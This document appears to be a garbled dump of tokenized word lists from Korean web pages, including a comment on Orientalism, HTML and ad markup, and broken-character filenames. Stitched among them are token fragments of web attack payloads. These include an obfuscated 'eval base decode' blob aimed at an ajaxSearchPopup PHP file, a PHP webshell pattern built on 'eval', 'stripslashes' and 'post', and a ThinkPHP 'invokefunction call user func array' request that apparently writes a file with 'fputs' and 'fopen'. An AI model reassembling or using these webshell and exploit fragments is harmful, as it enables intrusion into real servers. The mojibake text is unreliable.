['오리엔탈리즘에', '관하여', 'lms', 'common', 'smarteditor', 'upload', 'p', 'nbsp', 'p', 'p', 'nbsp', 'p', 'p', '저는', '해외에서', 'nbsp', '꽤', '오랜', '세월', '거주하면서', '제가', '경험하진', '않았지만', '간접적으로', '보고', '듣고', '느낀', '부분에', '대해서', '말하자면', '서양남성이', '동양여성을', 'nbsp', '조금', '낮게', 'nbsp', '바라보는', '태도나', '왜', '왔는지', '목적이나', '판단', '기준에', '대해서', '떠올랐어요', 'nbsp', '같은', '동양인이', '함께', '있는', '서양남성', '동양여성을', '바라보는', '시선', '또한', '차별의', '시선이', '가끔', '느껴지기도', '했고요', '그', '외에도', '동양에서', '온', '이민자', '및', '노동하는']
['코칭과', '상담에', '대해', 'p', 'table', 'cellspacing', 'cellpadding', 'width', 'border', 'tbody', 'tr', 'td', 'bgcolor', 'ffffff', 'align', 'center', 'table', 'cellspacing', 'cellpadding', 'width', 'border', 'tbody', 'tr', 'td', 'table', 'height', 'cellspacing', 'cellpadding', 'width', 'border', 'tbody', 'tr', 'td', 'width', 'td', 'td', 'width', 'td', 'td', 'class', 'n', 'orange', 'width', 'align', 'center', 'td', 'td', 'class', 'n', 'orange', 'width', 'align', 'center', 'a', 'href', 'javascript', 'jscommentdelete', 'target', 'blank', 'a', 'nbsp', 'td', 'tr', 'tr', 'td', 'width', 'td', 'td', 'colspan', '맞읍니다', '코칭과', '상담', '어느하나를', '무시', '할수가', '없지요', '적절한', '판단과', '조치가', '내려져야만이', '성공하는', '법이지요', '해서', '상담과', '코칭이', '필요에', '맞게', '조치가', '된', 'lms', 'common', 'smarteditor', 'upload']
['table', 'width', 'align', 'center', 'border', 'cellspacing', 'cellpadding', 'tbody', 'tr', 'td', 'width', 'center', 'img', 'src', 'http', 'www', 'ccdailynews', 'com', 'news', 'photo', 'jpg', 'border', 'td', 'td', 'width', 'script', 'ins', 'id', 'aswift', 'expand', 'style', 'margin', 'px', 'padding', 'px', 'border', 'currentcolor', 'border', 'image', 'none', 'width', 'px', 'height', 'px', 'display', 'inline', 'table', 'visibility', 'visible', 'position', 'relative', 'background', 'color', 'transparent', 'data', 'ad', 'slot', 'ins', 'id', 'aswift', 'anchor', 'style', 'margin', 'px', 'padding', 'px', 'border', 'currentcolor', 'border', 'image', 'none', 'width', 'px', 'clear', 'both', 'margin', 'bottom', 'px', 'margin', 'left', 'px', 'float', 'right', 'script', 'type', 'text', 'javascript', 'src', 'http', 'ad', 'ilikesponsorad', 'com', 'ad', 'ad', 'js', 'adimpmgrcode', 'view', 'r', 'caption', 'id', 'font', 'imgdown', 'colspan']
['boxleft', 'clearfix', 'style', 'margin', 'px', 'px', 'px', 'px', 'float', 'left', 'div', 'class', 'vidtype', 'style', 'background', 'rgb', 'border', 'px', 'solid', 'rgb', 'width', 'px', 'height', 'px', 'display', 'block', 'position', 'relative', 'z', 'index', 'cursor', 'pointer', 'box', 'sizing', 'border', 'box', 'iframe', 'width', 'height', 'title', '逵柰', 'src', 'https', 'www', 'youtube', 'com', 'embed', 'c', 'jzlqzylug', 'frameborder', 'allowfullscreen', 'allow', 'autoplay', 'encrypted', 'media', 'iframe', 'div', 'p', 'class', 'refermark', 'bullet', 'style', 'margin', 'px', 'px', 'px', 'padding', 'px', 'px', 'px', 'px', 'width', 'px', 'text', 'align', 'left', 'color', 'rgb', 'line', 'height', 'px', 'font', 'size', 'rem', 'font', 'weight', 'position', 'relative', 'box', 'sizing', 'border', 'box', '클絿첩', '크', '笭求', 'p']
['ums', 'insertemailinfo']
['ums', 'inserttalkinfo']
['nowords', 'filter', 'id', 'eval', 'base', 'decode', 'array', 'pop', 'post', 'exit', 'documents', 'language', 'english', 'config', 'assets', 'snippets', 'ajaxsearch', 'ajaxsearchpopup', 'php', 'eval', 'sknnyiqn', 'gs', 'jhm', 'jf', 'trvjwrvjbj', 'rpq', 'vnru', 'ux', 'jpt', 'qnxs', 'nl', 'fzc', 'v', 'cy', 'noyrzmt', 'kcy', 'naw', 'hz', 'vzlyc', 'jgzopwzvcgvukcrzms', 'nywnjzxnzb', 'ucghwjywndycpo', 'z', 'cml', 'zsgkzmgsjzw', 'cghwigvjag', 'gnzq', 'nzcznys', 'mzy', 'mjm', 'jhjhug', 'fclpsdw', 'fpwjhc', 'u', 'nf', 'kzwnvzguoilkilmnocigxmdkplijgii', 'jahiomtiyks', 'jahiootaplijuii', 'jahioodkplmnocig', 'ockuy', 'hykdg', 'ks', 'imiiuiliilijsii', 'iwsiuy', 'hykduwks', 'iosiuy', 'hykdewnykuiloilmnocig', 'mskuij', 'ilii', 'iik', 'jhlku', 'pqdg', 'cln', 'pwjhc', 'u', 'nf', 'kzwnvzguoy', 'hykdg', 'ks', 'imiiuy', 'hykdu', 'ks', 'jahiomte', 'ks', 'jahiomtaxks', 'jahio']
['ini', 'set', 'display', 'errors', 'set', 'time', 'limit', 'set', 'magic', 'quotes', 'runtime', 'echo', 'd', 'dirname', 'server', 'script', 'filename', 'if', 'd', 'd', 'dirname', 'server', 'path', 'translated', 'root', 'isset', 'server', 'document', 'root', 'server', 'document', 'root', 'isset', 'server', 'appl', 'physical', 'path', 'trim', 'eval', 'get', 'magic', 'quotes', 'gpc', 'stripslashes', 'post', 'chr', 'chr', 'post', 'chr', 'chr']
['js', 'static', 'jquery', 'bxslider', 'lib']
['search', 'js', 'static']
['튜', '청', 'docx', 'false', 'upload', 'im', 'c', 'b', 'c', 'd', 'c', 'ece', 'f', 'a', 'f', 'docx', 'basic', 'seq', 'p', 'img', 'alt', 'src', 'upload', 'im', 'fdd', 'd', 'f', 'b', 'b', 'bf', 'a', 'cbd', 'jpg', 'style', 'height', '튜苑뵀', '튜', '究', 'upload', 'im', 'a', 'c', 'f', 'e', 'b', 'b', 'a', 'd', 'a', 'b', 'hwp', 'upload', 'im', 'cd', 'd', 'e', 'e', 'b', 'a', 'dfcf', 'e', 'gif', 'true', 'lg첨', '途', '求', '튜', '튜', '크庫', '킵爾', '母', '쩔', '튜', '청', '畸', 'hwp']
['튜', '청', 'docx', 'false', 'upload', 'im', 'c', 'b', 'c', 'd', 'c', 'ece', 'f', 'a', 'f', 'docx', 'basic', 'seq', 'p', 'img', 'alt', 'src', 'upload', 'im', 'fdd', 'd', 'f', 'b', 'b', 'bf', 'a', 'cbd', 'jpg', 'style', 'height', '튜苑뵀', '튜', '究', 'upload', 'im', 'a', 'c', 'f', 'e', 'b', 'b', 'a', 'd', 'a', 'b', 'hwp', 'upload', 'im', 'cd', 'd', 'e', 'e', 'b', 'a', 'dfcf', 'e', 'gif', 'true', 'lg첨', '途', '求', '튜', '튜', '크庫', '킵爾', '母', '쩔', '튜', '청', '畸', 'hwp']
['false', '克', 'basic', 'hcn', '크', '첨姑', '錚', 'true', 'null', 'h', '크', '첨姑', '錚', '摸嘲', '첨', '嶺', 'h', 'n', 'n', 'p', 'iframe', 'frameborder', 'height', 'src', 'https']
['청', 'zip', 'false', '커', 'basic', 'seq', 'p', 'img', 'alt', 'src', 'upload', 'im', 'fdd', 'd', 'f', 'b', 'b', 'bf', 'a', 'cbd', 'jpg', 'style', 'height', 'upload', 'im', 'dd', 'a', 'f', 'c', 'ee', 'c', 'f', 'd', 'd', 'f', 'zip', 'lg첨', '途', '求', '튜', '크庫', '킵爾', '母', '쩔', 'upload', 'im', 'b', 'de', 'b', 'b', 'd', 'e', 'e', 'ec', 'bb', 'f', 'd', 'gif', '苑뵀', '究']
['튜', '크庫', '킵爾', '母', '쩔', 'upload', 'im', 'd', 'f', 'ec', 'a', 'e', 'a', 'ea', 'jpg', 'false', 'basic', 'p', 'img', 'alt', 'src', 'upload', 'im', 'fdd', 'd', 'f', 'b', 'b', 'bf', 'a', 'cbd', 'jpg', 'style', 'height', 'lg첨', '途求', '튜']
['false', '美', 'p', 'iframe', 'src', 'e', 'issuu', 'com', 'embed', 'html', 'style', 'border', 'basic', '책米', 'true', 'null', '트', '諛', '恝', '貫', '構', '綬', '令', '笭', '毛', '풔耉', '爛求']
['美', 'p', 'iframe', 'src', 'e', 'issuu', 'com', 'embed', 'html', 'style', 'border', 'false', 'upload', 'im', 'fdd', 'def', 'a', 'd', 'e', 'e', 'jpg', 'basic', '책米', '트', 'true', '트', '諛', '恝', '貫', '構', '綬', '令', '笭', '毛', '풔耉', '爛求']
['false', 'basic', 'www', 'youtube', 'com', 'embed', 'etycrpbtplq', 'width', 'iframe', 'p', 'n', 'n', 'p', 'nbsp', 'p', 'n', 'true', 'p', '퓰처', 'p', 'n', 'n', 'p', '市', '琯躍', 'nbsp', 'p', 'n', 'n', 'p', '肉', '畺', '홰', '躍', 'br', 'n', '市', 'nbsp', '트', '瓦', '故', '市', '트', '瓦', '故都求', '故', '트', '瓦', 'upload', 'im', 'c', 'a', 'bcea', 'b', 'aea', 'bba', 'a', 'e', 'png']
['暠努', 'false', 'upload', 'im', 'ac', 'c', 'c', 'be', 'd', 'f', 'cdac', 'c', 'jpg', 'basic', '閨', '曼', '琯', 'true', 'null', 'p', 'iframe', 'frameborder', 'height', 'src', 'https']
['旁', '치', '활', '煐']
['暠努', 'false', 'basic', 'true', 'null', '閨', '僊', '책', 'p', '閨', '僊', '책']
['홍米', 'false', 'basic', '활', '체', '활', 'upload', 'im', 'c', 'd', 'f', 'df', 'a', 'c', 'e', 'cf', 'png', 'true', '회', '체', '활', '활', '努求', 'p', 'iframe', 'src', 'e', 'issuu', 'com', 'embed', 'html', 'style', 'border']
['p', 'style', 'text', 'align', 'false', 'upload', 'im', 'd', 'c', 'c', 'd', 'a', 'b', 'ff', 'db', 'fa', 'png', '홰', 'basic', '천', '첨', '閨', '홰', '米']
['news', 'title', 'text', 'h', 'id', 'news', 'title', 'text', 'id', '楣', '架', '堅', '嵐', '타키', '拈', 'h', 'div', 'class', 'news', 'title', 'author', '채', 'end', 'span', 'class', 'news', 'author', 'span', 'class', 'author', 'source', '瞿', 'span', 'b', 'li', 'id', 'j', '方', '嚥둔', '蛋', 'span', 'script', 'type', 'text', 'javascript', 'src', 'static', 'naver', 'net', 'blog', 'share', 'blog', 'sharebutton', 'js', 'v', 'charset', 'utf', 'script', 'script', 'type', 'text', 'javascript', 'var', 'title', 'news', 'title', 'text', 'id', 'text', 'title', 'encodeuricomponent', 'title', 'new', 'shareblog', 'makebutton', 'type', 'c', 'title', 'title', 'scri']
['eval', 'get', 'fuck', 'assert', 'fputs', 'fopen', 'base', 'decode', 'ec', 'waha', 'w', 'base', 'decode', 'pd', 'wahagzxzhbcgkx', 'bpu', 'rbeglhb', 'ppz', 'ynnozwxs', 'http', 'index', 'think', 'app', 'invokefunction', 'call', 'user', 'func', 'array']
